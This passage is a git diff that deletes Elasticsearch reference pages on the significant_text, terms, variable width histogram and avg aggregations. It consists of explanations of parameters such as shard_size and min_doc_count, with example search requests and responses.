Shard Size - -The `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. By -default, the node coordinating the search process will request each shard to provide its own top term buckets -and once all shards respond, it will reduce the results to the final list that will then be returned to the client. -If the number of unique terms is greater than `size`, the returned list can be slightly off and not accurate -(it could be that the term counts are slightly off and it could even be that a term that should have been in the top -size buckets was not returned). - -To ensure better accuracy a multiple of the final `size` is used as the number of terms to request from each shard -(`2 * (size * 1.5 + 10)`). To take manual control of this setting the `shard_size` parameter -can be used to control the volumes of candidate terms produced by each shard. - -Low-frequency terms can turn out to be the most interesting ones once all results are combined so the -significant_terms aggregation can produce higher-quality results when the `shard_size` parameter is set to -values significantly higher than the `size` setting. This ensures that a bigger volume of promising candidate terms are given -a consolidated review by the reducing node before the final selection. Obviously large candidate term lists -will cause extra network traffic and RAM usage so this is quality/cost trade off that needs to be balanced. If `shard_size` is set to -1 (the default) then `shard_size` will be automatically estimated based on the number of shards and the `size` parameter. - - -NOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, elasticsearch will - override it and reset it to be equal to `size`. - -===== Minimum document count - -It is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option. -The Default value is 3. - -Terms that score highly will be collected on a shard level and merged with the terms collected from other shards in a second step. -However, the shard does not have the information about the global term frequencies available. The decision if a term is added to a -candidate list depends only on the score computed on the shard using local shard frequencies, not the global frequencies of the word. -The `min_doc_count` criterion is only applied after merging local terms statistics of all shards. In a way the decision to add the -term as a candidate is made without being very _certain_ about if the term will actually reach the required `min_doc_count`. -This might cause many (globally) high frequent terms to be missing in the final result if low frequent but high scoring terms populated -the candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. -However, this increases memory consumption and network traffic. - -`shard_min_doc_count` parameter - -The parameter `shard_min_doc_count` regulates the _certainty_ a shard has if the term should actually be added to the candidate list or -not with respect to the `min_doc_count`. Terms will only be considered if their local shard frequency within the set is higher than the -`shard_min_doc_count`. If your dictionary contains many low frequent words and you are not interested in these (for example misspellings), -then you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will with a reasonable certainty -not reach the required `min_doc_count` even after merging the local frequencies. `shard_min_doc_count` is set to `1` per default and has -no effect unless you explicitly set it. - - - - -WARNING: Setting `min_doc_count` to `1` is generally not advised as it tends to return terms that - are typos or other bizarre curiosities. Finding more than one instance of a term helps - reinforce that, while still rare, the term was not the result of a one-off accident. The - default value of 3 is used to provide a minimum weight-of-evidence. - Setting `shard_min_doc_count` too high will cause significant candidate terms to be filtered out on a shard level. - This value should be set much lower than `min_doc_count/#shards`. - - - -===== Custom background context - -The default source of statistical information for background term frequencies is the entire index and this -scope can be narrowed through the use of a `background_filter` to focus in on significant terms within a narrower -context: - -[source,console] --------------------------------------------------- -GET news/_search -{ - "query": { - "match": { - "content": "madrid" - } - }, - "aggs": { - "tags": { - "significant_text": { - "field": "content", - "background_filter": { - "term": { "content": "spain" } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:news] - -The above filter would help focus in on terms that were peculiar to the city of Madrid rather than revealing -terms like "Spanish" that are unusual in the full index's worldwide context but commonplace in the subset of documents containing the -word "Spain". - -WARNING: Use of background filters will slow the query as each term's postings must be filtered to determine a frequency - - -===== Dealing with source and index mappings - -Ordinarily the indexed field name and the original JSON field being retrieved share the same name. -However with more complex field mappings using features like `copy_to` the source -JSON field(s) and the indexed field being aggregated can differ. -In these cases it is possible to list the JSON _source fields from which text -will be analyzed using the `source_fields` parameter: - -[source,console] --------------------------------------------------- -GET news/_search -{ - "query": { - "match": { - "custom_all": "elasticsearch" - } - }, - "aggs": { - "tags": { - "significant_text": { - "field": "custom_all", - "source_fields": [ "content", "title" ] - } - } - } -} --------------------------------------------------- -// TEST[setup:news] - - -===== Filtering Values - -It is possible (although rarely required) to filter the values for which buckets will be created. This can be done using the `include` and -`exclude` parameters which are based on a regular expression string or arrays of exact terms. This functionality mirrors the features -described in the <> documentation. - - diff --git a/docs/reference/aggregations/bucket/terms-aggregation.asciidoc b/docs/reference/aggregations/bucket/terms-aggregation.asciidoc deleted file mode 100644 index 210ed3c2d5c..00000000000 --- a/docs/reference/aggregations/bucket/terms-aggregation.asciidoc +++ /dev/null @@ -1,772 +0,0 @@ -[[search-aggregations-bucket-terms-aggregation]] -=== Terms aggregation -++++ -Terms -++++ - -A multi-bucket value source based aggregation where buckets are dynamically built - one per unique value. - -////////////////////////// - -[source,js] --------------------------------------------------- -PUT /products -{ - "mappings": { - "properties": { - "genre": { - "type": "keyword" - }, - "product": { - "type": "keyword" - } - } - } -} - -POST /products/_bulk?refresh -{"index":{"_id":0}} -{"genre": "rock", "product": "Product A"} -{"index":{"_id":1}} -{"genre": "rock"} -{"index":{"_id":2}} -{"genre": "rock"} -{"index":{"_id":3}} -{"genre": "jazz", "product": "Product Z"} -{"index":{"_id":4}} -{"genre": "jazz"} -{"index":{"_id":5}} -{"genre": "electronic"} -{"index":{"_id":6}} -{"genre": "electronic"} -{"index":{"_id":7}} -{"genre": "electronic"} -{"index":{"_id":8}} -{"genre": "electronic"} -{"index":{"_id":9}} -{"genre": "electronic"} -{"index":{"_id":10}} -{"genre": "electronic"} - -------------------------------------------------- -// NOTCONSOLE -// TESTSETUP - -////////////////////////// - -Example: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "terms": { "field": "genre" } <1> - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - -<1> `terms` aggregation should be a field of type `keyword` or any other data type suitable for bucket aggregations. In order to use it with `text` you will need to enable -<>. - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "genres": { - "doc_count_error_upper_bound": 0, <1> - "sum_other_doc_count": 0, <2> - "buckets": [ <3> - { - "key": "electronic", - "doc_count": 6 - }, - { - "key": "rock", - "doc_count": 3 - }, - { - "key": "jazz", - "doc_count": 2 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\.//] - -<1> an upper bound of the error on the document counts for each term, see <> -<2> when there are lots of unique terms, Elasticsearch only returns the top terms; this number is the sum of the document counts for all buckets that are not part of the response -<3> the list of the top buckets, the meaning of `top` being defined by the <> - -By default, the `terms` aggregation will return the buckets for the top ten terms ordered by the `doc_count`. One can -change this default behaviour by setting the `size` parameter. - -[[search-aggregations-bucket-terms-aggregation-size]] -==== Size - -The `size` parameter can be set to define how many term buckets should be returned out of the overall terms list. By -default, the node coordinating the search process will request each shard to provide its own top `size` term buckets -and once all shards respond, it will reduce the results to the final list that will then be returned to the client. -This means that if the number of unique terms is greater than `size`, the returned list is slightly off and not accurate -(it could be that the term counts are slightly off and it could even be that a term that should have been in the top -size buckets was not returned). - -NOTE: If you want to retrieve **all** terms or all combinations of terms in a nested `terms` aggregation - you should use the <> aggregation which - allows to paginate over all possible terms rather than setting a size greater than the cardinality of the field in the - `terms` aggregation. The `terms` aggregation is meant to return the `top` terms and does not allow pagination. - -[[search-aggregations-bucket-terms-aggregation-approximate-counts]] -==== Document counts are approximate - -Document counts (and the results of any sub aggregations) in the terms -aggregation are not always accurate. Each shard provides its own view of what -the ordered list of terms should be. These views are combined to give a final -view. - -==== Shard Size - -The higher the requested `size` is, the more accurate the results will be, but also, the more expensive it will be to -compute the final results (both due to bigger priority queues that are managed on a shard level and due to bigger data -transfers between the nodes and the client). - -The `shard_size` parameter can be used to minimize the extra work that comes with bigger requested `size`. When defined, -it will determine how many terms the coordinating node will request from each shard. Once all the shards responded, the -coordinating node will then reduce them to a final result which will be based on the `size` parameter - this way, -one can increase the accuracy of the returned terms and avoid the overhead of streaming a big list of buckets back to -the client. - - -NOTE: `shard_size` cannot be smaller than `size` (as it doesn't make much sense). When it is, Elasticsearch will - override it and reset it to be equal to `size`. - - -The default `shard_size` is `(size * 1.5 + 10)`. - -==== Calculating Document Count Error - -There are two error values which can be shown on the terms aggregation. The first gives a value for the aggregation as -a whole which represents the maximum potential document count for a term which did not make it into the final list of -terms. This is calculated as the sum of the document count from the last term returned from each shard. - -==== Per bucket document count error - -The second error value can be enabled by setting the `show_term_doc_count_error` parameter to true: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "products": { - "terms": { - "field": "product", - "size": 5, - "show_term_doc_count_error": true - } - } - } -} --------------------------------------------------- -// TEST[s/_search/_search\?filter_path=aggregations/] - - -This shows an error value for each term returned by the aggregation which represents the 'worst case' error in the document count -and can be useful when deciding on a value for the `shard_size` parameter. This is calculated by summing the document counts for -the last term returned by all shards which did not return the term. - -These errors can only be calculated in this way when the terms are ordered by descending document count. When the aggregation is -ordered by the terms values themselves (either ascending or descending) there is no error in the document count since if a shard -does not return a particular term which appears in the results from another shard, it must not have that term in its index. When the -aggregation is either sorted by a sub aggregation or in order of ascending document count, the error in the document counts cannot be -determined and is given a value of -1 to indicate this. - -[[search-aggregations-bucket-terms-aggregation-order]] -==== Order - -The order of the buckets can be customized by setting the `order` parameter. By default, the buckets are ordered by -their `doc_count` descending. It is possible to change this behaviour as documented below: - -WARNING: Sorting by ascending `_count` or by sub aggregation is discouraged as it increases the -<> on document counts. -It is fine when a single shard is queried, or when the field that is being aggregated was used -as a routing key at index time: in these cases results will be accurate since shards have disjoint -values. However otherwise, errors are unbounded. One particular case that could still be useful -is sorting by <> or -<> aggregation: counts will not be accurate -but at least the top buckets will be correctly picked. - -Ordering the buckets by their doc `_count` in an ascending manner: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "terms": { - "field": "genre", - "order": { "_count": "asc" } - } - } - } -} --------------------------------------------------- - -Ordering the buckets alphabetically by their terms in an ascending manner: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "terms": { - "field": "genre", - "order": { "_key": "asc" } - } - } - } -} --------------------------------------------------- - -deprecated[6.0.0, Use `_key` instead of `_term` to order buckets by their term] - -Ordering the buckets by single value metrics sub-aggregation (identified by the aggregation name): - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "terms": { - "field": "genre", - "order": { "max_play_count": "desc" } - }, - "aggs": { - "max_play_count": { "max": { "field": "play_count" } } - } - } - } -} --------------------------------------------------- - -Ordering the buckets by multi value metrics sub-aggregation (identified by the aggregation name): - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "terms": { - "field": "genre", - "order": { "playback_stats.max": "desc" } - }, - "aggs": { - "playback_stats": { "stats": { "field": "play_count" } } - } - } - } -} --------------------------------------------------- - -[NOTE] -.Pipeline aggs cannot be used for sorting -======================================= - -<> are run during the -reduce phase after all other aggregations have already completed. For this -reason, they cannot be used for ordering. - -======================================= - -It is also possible to order the buckets based on a "deeper" aggregation in the hierarchy. This is supported as long -as the aggregations path are of a single-bucket type, where the last aggregation in the path may either be a single-bucket -one or a metrics one. If it's a single-bucket type, the order will be defined by the number of docs in the bucket (i.e. `doc_count`), -in case it's a metrics one, the same rules as above apply (where the path must indicate the metric name to sort by in case of -a multi-value metrics aggregation, and in case of a single-value metrics aggregation the sort will be applied on that value). - -The path must be defined in the following form: - -// {wikipedia}/Extended_Backus%E2%80%93Naur_Form -[source,ebnf] --------------------------------------------------- -AGG_SEPARATOR = '>' ; -METRIC_SEPARATOR = '.' ; -AGG_NAME = ; -METRIC = ; -PATH = [ , ]* [ , ] ; --------------------------------------------------- - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "countries": { - "terms": { - "field": "artist.country", - "order": { "rock>playback_stats.avg": "desc" } - }, - "aggs": { - "rock": { - "filter": { "term": { "genre": "rock" } }, - "aggs": { - "playback_stats": { "stats": { "field": "play_count" } } - } - } - } - } - } -} --------------------------------------------------- - -The above will sort the artist's countries buckets based on the average play count among the rock songs. - -Multiple criteria can be used to order the buckets by providing an array of order criteria such as the following: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "countries": { - "terms": { - "field": "artist.country", - "order": [ { "rock>playback_stats.avg": "desc" }, { "_count": "desc" } ] - }, - "aggs": { - "rock": { - "filter": { "term": { "genre": "rock" } }, - "aggs": { - "playback_stats": { "stats": { "field": "play_count" } } - } - } - } - } - } -} --------------------------------------------------- - -The above will sort the artist's countries buckets based on the average play count among the rock songs and then by -their `doc_count` in descending order. - -NOTE: In the event that two buckets share the same values for all order criteria the bucket's term value is used as a -tie-breaker in ascending alphabetical order to prevent non-deterministic ordering of buckets. - -==== Minimum document count - -It is possible to only return terms that match more than a configured number of hits using the `min_doc_count` option: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "tags": { - "terms": { - "field": "tags", - "min_doc_count": 10 - } - } - } -} --------------------------------------------------- - -The above aggregation would only return tags which have been found in 10 hits or more. Default value is `1`. - - -Terms are collected and ordered on a shard level and merged with the terms collected from other shards in a second step. However, the shard does not have the information about the global document count available. The decision if a term is added to a candidate list depends only on the order computed on the shard using local shard frequencies. The `min_doc_count` criterion is only applied after merging local terms statistics of all shards. In a way the decision to add the term as a candidate is made without being very _certain_ about if the term will actually reach the required `min_doc_count`. This might cause many (globally) high frequent terms to be missing in the final result if low frequent terms populated the candidate lists. To avoid this, the `shard_size` parameter can be increased to allow more candidate terms on the shards. However, this increases memory consumption and network traffic. - -`shard_min_doc_count` parameter - -The parameter `shard_min_doc_count` regulates the _certainty_ a shard has if the term should actually be added to the candidate list or not with respect to the `min_doc_count`. Terms will only be considered if their local shard frequency within the set is higher than the `shard_min_doc_count`. If your dictionary contains many low frequent terms and you are not interested in those (for example misspellings), then you can set the `shard_min_doc_count` parameter to filter out candidate terms on a shard level that will with a reasonable certainty not reach the required `min_doc_count` even after merging the local counts. `shard_min_doc_count` is set to `0` per default and has no effect unless you explicitly set it. - - - -NOTE: Setting `min_doc_count`=`0` will also return buckets for terms that didn't match any hit. However, some of - the returned terms which have a document count of zero might only belong to deleted documents or documents - from other types, so there is no warranty that a `match_all` query would find a positive document count for - those terms. - -WARNING: When NOT sorting on `doc_count` descending, high values of `min_doc_count` may return a number of buckets - which is less than `size` because not enough data was gathered from the shards. Missing buckets can be - back by increasing `shard_size`. - Setting `shard_min_doc_count` too high will cause terms to be filtered out on a shard level. This value should be set much lower than `min_doc_count/#shards`. - -[[search-aggregations-bucket-terms-aggregation-script]] -==== Script - -Generating the terms using a script: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "terms": { - "script": { - "source": "doc['genre'].value", - "lang": "painless" - } - } - } - } -} --------------------------------------------------- - -This will interpret the `script` parameter as an `inline` script with the default script language and no script parameters. To use a stored script use the following syntax: - -////////////////////////// - -[source,console] --------------------------------------------------- -POST /_scripts/my_script -{ - "script": { - "lang": "painless", - "source": "doc[params.field].value" - } -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "terms": { - "script": { - "id": "my_script", - "params": { - "field": "genre" - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -==== Value Script - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "genres": { - "terms": { - "field": "genre", - "script": { - "source": "'Genre: ' +_value", - "lang": "painless" - } - } - } - } -} --------------------------------------------------- - -==== Filtering Values - -It is possible to filter the values for which buckets will be created. This can be done using the `include` and -`exclude` parameters which are based on regular expression strings or arrays of exact values. Additionally, -`include` clauses can filter using `partition` expressions. - -===== Filtering Values with regular expressions - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "tags": { - "terms": { - "field": "tags", - "include": ".*sport.*", - "exclude": "water_.*" - } - } - } -} --------------------------------------------------- - -In the above example, buckets will be created for all the tags that has the word `sport` in them, except those starting -with `water_` (so the tag `water_sports` will not be aggregated). The `include` regular expression will determine what -values are "allowed" to be aggregated, while the `exclude` determines the values that should not be aggregated. When -both are defined, the `exclude` has precedence, meaning, the `include` is evaluated first and only then the `exclude`. - -The syntax is the same as <>. - -===== Filtering Values with exact values - -For matching based on exact values the `include` and `exclude` parameters can simply take an array of -strings that represent the terms as they are found in the index: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "JapaneseCars": { - "terms": { - "field": "make", - "include": [ "mazda", "honda" ] - } - }, - "ActiveCarManufacturers": { - "terms": { - "field": "make", - "exclude": [ "rover", "jensen" ] - } - } - } -} --------------------------------------------------- - -===== Filtering Values with partitions - -Sometimes there are too many unique terms to process in a single request/response pair so -it can be useful to break the analysis up into multiple requests. -This can be achieved by grouping the field's values into a number of partitions at query-time and processing -only one partition in each request. -Consider this request which is looking for accounts that have not logged any access recently: - -[source,console] --------------------------------------------------- -GET /_search -{ - "size": 0, - "aggs": { - "expired_sessions": { - "terms": { - "field": "account_id", - "include": { - "partition": 0, - "num_partitions": 20 - }, - "size": 10000, - "order": { - "last_access": "asc" - } - }, - "aggs": { - "last_access": { - "max": { - "field": "access_date" - } - } - } - } - } -} --------------------------------------------------- - -This request is finding the last logged access date for a subset of customer accounts because we -might want to expire some customer accounts who haven't been seen for a long while. -The `num_partitions` setting has requested that the unique account_ids are organized evenly into twenty -partitions (0 to 19). and the `partition` setting in this request filters to only consider account_ids falling -into partition 0. Subsequent requests should ask for partitions 1 then 2 etc to complete the expired-account analysis. - -Note that the `size` setting for the number of results returned needs to be tuned with the `num_partitions`. -For this particular account-expiration example the process for balancing values for `size` and `num_partitions` would be as follows: - -1. Use the `cardinality` aggregation to estimate the total number of unique account_id values -2. Pick a value for `num_partitions` to break the number from 1) up into more manageable chunks -3. Pick a `size` value for the number of responses we want from each partition -4. Run a test request - -If we have a circuit-breaker error we are trying to do too much in one request and must increase `num_partitions`. -If the request was successful but the last account ID in the date-sorted test response was still an account we might want to -expire then we may be missing accounts of interest and have set our numbers too low. We must either - -* increase the `size` parameter to return more results per partition (could be heavy on memory) or -* increase the `num_partitions` to consider less accounts per request (could increase overall processing time as we need to make more requests) - -Ultimately this is a balancing act between managing the Elasticsearch resources required to process a single request and the volume -of requests that the client application must issue to complete a task. - -==== Multi-field terms aggregation - -The `terms` aggregation does not support collecting terms from multiple fields -in the same document. The reason is that the `terms` agg doesn't collect the -string term values themselves, but rather uses -<> -to produce a list of all of the unique values in the field. Global ordinals -results in an important performance boost which would not be possible across -multiple fields. - -There are two approaches that you can use to perform a `terms` agg across -multiple fields: - -<>:: - -Use a script to retrieve terms from multiple fields. This disables the global -ordinals optimization and will be slower than collecting terms from a single -field, but it gives you the flexibility to implement this option at search -time. - -<>:: - -If you know ahead of time that you want to collect the terms from two or more -fields, then use `copy_to` in your mapping to create a new dedicated field at -index time which contains the values from both fields. You can aggregate on -this single field, which will benefit from the global ordinals optimization. - -[[search-aggregations-bucket-terms-aggregation-collect]] -==== Collect mode - -Deferring calculation of child aggregations - -For fields with many unique terms and a small number of required results it can be more efficient to delay the calculation -of child aggregations until the top parent-level aggs have been pruned. Ordinarily, all branches of the aggregation tree -are expanded in one depth-first pass and only then any pruning occurs. -In some scenarios this can be very wasteful and can hit memory constraints. -An example problem scenario is querying a movie database for the 10 most popular actors and their 5 most common co-stars: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "actors": { - "terms": { - "field": "actors", - "size": 10 - }, - "aggs": { - "costars": { - "terms": { - "field": "actors", - "size": 5 - } - } - } - } - } -} --------------------------------------------------- - -Even though the number of actors may be comparatively small and we want only 50 result buckets there is a combinatorial explosion of buckets -during calculation - a single actor can produce n² buckets where n is the number of actors. The sane option would be to first determine -the 10 most popular actors and only then examine the top co-stars for these 10 actors. This alternative strategy is what we call the `breadth_first` collection -mode as opposed to the `depth_first` mode. - -NOTE: The `breadth_first` is the default mode for fields with a cardinality bigger than the requested size or when the cardinality is unknown (numeric fields or scripts for instance). -It is possible to override the default heuristic and to provide a collect mode directly in the request: - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "actors": { - "terms": { - "field": "actors", - "size": 10, - "collect_mode": "breadth_first" <1> - }, - "aggs": { - "costars": { - "terms": { - "field": "actors", - "size": 5 - } - } - } - } - } -} --------------------------------------------------- - -<1> the possible values are `breadth_first` and `depth_first` - -When using `breadth_first` mode the set of documents that fall into the uppermost buckets are -cached for subsequent replay so there is a memory overhead in doing this which is linear with the number of matching documents. -Note that the `order` parameter can still be used to refer to data from a child aggregation when using the `breadth_first` setting - the parent -aggregation understands that this child aggregation will need to be called first before any of the other child aggregations. - -WARNING: Nested aggregations such as `top_hits` which require access to score information under an aggregation that uses the `breadth_first` -collection mode need to replay the query on the second pass but only for the documents belonging to the top buckets. - -[[search-aggregations-bucket-terms-aggregation-execution-hint]] -==== Execution hint - -There are different mechanisms by which terms aggregations can be executed: - - - by using field values directly in order to aggregate data per-bucket (`map`) - - by using global ordinals of the field and allocating one bucket per global ordinal (`global_ordinals`) - -Elasticsearch tries to have sensible defaults so this is something that generally doesn't need to be configured. - -`global_ordinals` is the default option for `keyword` field, it uses global ordinals to allocates buckets dynamically -so memory usage is linear to the number of values of the documents that are part of the aggregation scope. - -`map` should only be considered when very few documents match a query. Otherwise the ordinals-based execution mode -is significantly faster. By default, `map` is only used when running an aggregation on scripts, since they don't have -ordinals. - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "tags": { - "terms": { - "field": "tags", - "execution_hint": "map" <1> - } - } - } -} --------------------------------------------------- - -<1> The possible values are `map`, `global_ordinals` - -Please note that Elasticsearch will ignore this execution hint if it is not applicable and that there is no backward compatibility guarantee on these hints. - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored but it is also possible to treat them as if they -had a value. - -[source,console] --------------------------------------------------- -GET /_search -{ - "aggs": { - "tags": { - "terms": { - "field": "tags", - "missing": "N/A" <1> - } - } - } -} --------------------------------------------------- - -<1> Documents without a value in the `tags` field will fall into the same bucket as documents that have the value `N/A`. - -==== Mixing field types - -WARNING: When aggregating on multiple indices the type of the aggregated field may not be the same in all indices. -Some types are compatible with each other (`integer` and `long` or `float` and `double`) but when the types are a mix -of decimal and non-decimal number the terms aggregation will promote the non-decimal numbers to decimal numbers. -This can result in a loss of precision in the bucket values. diff --git a/docs/reference/aggregations/bucket/variablewidthhistogram-aggregation.asciidoc b/docs/reference/aggregations/bucket/variablewidthhistogram-aggregation.asciidoc deleted file mode 100644 index 1109a505b27..00000000000 --- a/docs/reference/aggregations/bucket/variablewidthhistogram-aggregation.asciidoc +++ /dev/null @@ -1,98 +0,0 @@ -[[search-aggregations-bucket-variablewidthhistogram-aggregation]] -=== Variable width histogram aggregation -++++ -Variable width histogram -++++ - -experimental::["This functionality is experimental and may be changed or removed completely in a future release. Elastic will take a best effort approach to fix any issues, but experimental features are not subject to the support SLA of official GA features. We're evaluating the request and response format for this new aggregation.",https://github.com/elastic/elasticsearch/issues/58573] - -This is a multi-bucket aggregation similar to <>. -However, the width of each bucket is not specified. Rather, a target number of buckets is provided and bucket intervals -are dynamically determined based on the document distribution. This is done using a simple one-pass document clustering algorithm -that aims to obtain low distances between bucket centroids. Unlike other multi-bucket aggregations, the intervals will not -necessarily have a uniform width. - -TIP: The number of buckets returned will always be less than or equal to the target number. - -Requesting a target of 2 buckets. - -[source,console] --------------------------------------------------- -POST /sales/_search?size=0 -{ - "aggs": { - "prices": { - "variable_width_histogram": { - "field": "price", - "buckets": 2 - } - } - } -} --------------------------------------------------- -// TEST[setup:sales] - -Response: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "prices": { - "buckets": [ - { - "min": 10.0, - "key": 30.0, - "max": 50.0, - "doc_count": 2 - }, - { - "min": 150.0, - "key": 185.0, - "max": 200.0, - "doc_count": 5 - } - ] - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -IMPORTANT: This aggregation cannot currently be nested under any aggregation that collects from more than a single bucket. - -==== Clustering Algorithm -Each shard fetches the first `initial_buffer` documents and stores them in memory. Once the buffer is full, these documents -are sorted and linearly separated into `3/4 * shard_size buckets`. -Next each remaining documents is either collected into the nearest bucket, or placed into a new bucket if it is distant -from all the existing ones. At most `shard_size` total buckets are created. - -In the reduce step, the coordinating node sorts the buckets from all shards by their centroids. Then, the two buckets -with the nearest centroids are repeatedly merged until the target number of buckets is achieved. -This merging procedure is a form of {wikipedia}/Hierarchical_clustering[agglomerative hierarchical clustering]. - -TIP: A shard can return fewer than `shard_size` buckets, but it cannot return more. - -==== Shard size -The `shard_size` parameter specifies the number of buckets that the coordinating node will request from each shard. -A higher `shard_size` leads each shard to produce smaller buckets. This reduce the likelihood of buckets overlapping -after the reduction step. Increasing the `shard_size` will improve the accuracy of the histogram, but it will -also make it more expensive to compute the final result because bigger priority queues will have to be managed on a -shard level, and the data transfers between the nodes and the client will be larger. - -TIP: Parameters `buckets`, `shard_size`, and `initial_buffer` are optional. By default, `buckets = 10`, `shard_size = buckets * 50`, and `initial_buffer = min(10 * shard_size, 50000)`. - -==== Initial Buffer -The `initial_buffer` parameter can be used to specify the number of individual documents that will be stored in memory -on a shard before the initial bucketing algorithm is run. Bucket distribution is determined using this sample -of `initial_buffer` documents. So, although a higher `initial_buffer` will use more memory, it will lead to more representative -clusters. - -==== Bucket bounds are approximate -During the reduce step, the master node continuously merges the two buckets with the nearest centroids. If two buckets have -overlapping bounds but distant centroids, then it is possible that they will not be merged. Because of this, after -reduction the maximum value in some interval (`max`) might be greater than the minimum value in the subsequent -bucket (`min`). To reduce the impact of this error, when such an overlap occurs the bound between these intervals is adjusted to be `(max + min) / 2`. - -TIP: Bucket bounds are very sensitive to outliers diff --git a/docs/reference/aggregations/metrics.asciidoc b/docs/reference/aggregations/metrics.asciidoc deleted file mode 100644 index e9680f8fc5b..00000000000 --- a/docs/reference/aggregations/metrics.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[[search-aggregations-metrics]] -== Metrics aggregations - -The aggregations in this family compute metrics based on values extracted in one way or another from the documents that -are being aggregated. The values are typically extracted from the fields of the document (using the field data), but -can also be generated using scripts. - -Numeric metrics aggregations are a special type of metrics aggregation which output numeric values. Some aggregations output -a single numeric metric (e.g. `avg`) and are called `single-value numeric metrics aggregation`, others generate multiple -metrics (e.g. `stats`) and are called `multi-value numeric metrics aggregation`. The distinction between single-value and -multi-value numeric metrics aggregations plays a role when these aggregations serve as direct sub-aggregations of some -bucket aggregations (some bucket aggregations enable you to sort the returned buckets based on the numeric metrics in each bucket). - -include::metrics/avg-aggregation.asciidoc[] - -include::metrics/boxplot-aggregation.asciidoc[] - -include::metrics/cardinality-aggregation.asciidoc[] - -include::metrics/extendedstats-aggregation.asciidoc[] - -include::metrics/geobounds-aggregation.asciidoc[] - -include::metrics/geocentroid-aggregation.asciidoc[] - -include::metrics/matrix-stats-aggregation.asciidoc[] - -include::metrics/max-aggregation.asciidoc[] - -include::metrics/median-absolute-deviation-aggregation.asciidoc[] - -include::metrics/min-aggregation.asciidoc[] - -include::metrics/percentile-rank-aggregation.asciidoc[] - -include::metrics/percentile-aggregation.asciidoc[] - -include::metrics/rate-aggregation.asciidoc[] - -include::metrics/scripted-metric-aggregation.asciidoc[] - -include::metrics/stats-aggregation.asciidoc[] - -include::metrics/string-stats-aggregation.asciidoc[] - -include::metrics/sum-aggregation.asciidoc[] - -include::metrics/t-test-aggregation.asciidoc[] - -include::metrics/tophits-aggregation.asciidoc[] - -include::metrics/top-metrics-aggregation.asciidoc[] - -include::metrics/valuecount-aggregation.asciidoc[] - -include::metrics/weighted-avg-aggregation.asciidoc[] diff --git a/docs/reference/aggregations/metrics/avg-aggregation.asciidoc b/docs/reference/aggregations/metrics/avg-aggregation.asciidoc deleted file mode 100644 index 29178c6d388..00000000000 --- a/docs/reference/aggregations/metrics/avg-aggregation.asciidoc +++ /dev/null @@ -1,185 +0,0 @@ -[[search-aggregations-metrics-avg-aggregation]] -=== Avg aggregation -++++ -Avg -++++ - -A `single-value` metrics aggregation that computes the average of numeric values that are extracted from the aggregated documents. These values can be extracted either from specific numeric fields in the documents, or be generated by a provided script. - -Assuming the data consists of documents representing exams grades (between 0 -and 100) of students we can average their scores with: - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "avg_grade": { "avg": { "field": "grade" } } - } -} --------------------------------------------------- -// TEST[setup:exams] - -The above aggregation computes the average grade over all documents. The aggregation type is `avg` and the `field` setting defines the numeric field of the documents the average will be computed on. The above will return the following: - -[source,console-result] --------------------------------------------------- -{ - ... - "aggregations": { - "avg_grade": { - "value": 75.0 - } - } -} --------------------------------------------------- -// TESTRESPONSE[s/\.\.\./"took": $body.took,"timed_out": false,"_shards": $body._shards,"hits": $body.hits,/] - -The name of the aggregation (`avg_grade` above) also serves as the key by which the aggregation result can be retrieved from the returned response. - -==== Script - -Computing the average grade based on a script: - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "avg_grade": { - "avg": { - "script": { - "source": "doc.grade.value" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -This will interpret the `script` parameter as an `inline` script with the `painless` script language and no script parameters. To use a stored script use the following syntax: - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "avg_grade": { - "avg": { - "script": { - "id": "my_script", - "params": { - "field": "grade" - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams,stored_example_script] - -===== Value Script - -It turned out that the exam was way above the level of the students and a grade correction needs to be applied. We can use value script to get the new average: - -[source,console] --------------------------------------------------- -POST /exams/_search?size=0 -{ - "aggs": { - "avg_corrected_grade": { - "avg": { - "field": "grade", - "script": { - "lang": "painless", - "source": "_value * params.correction", - "params": { - "correction": 1.2 - } - } - } - } - } -} --------------------------------------------------- -// TEST[setup:exams] - -==== Missing value - -The `missing` parameter defines how documents that are missing a value should be treated. -By default they will be ignored 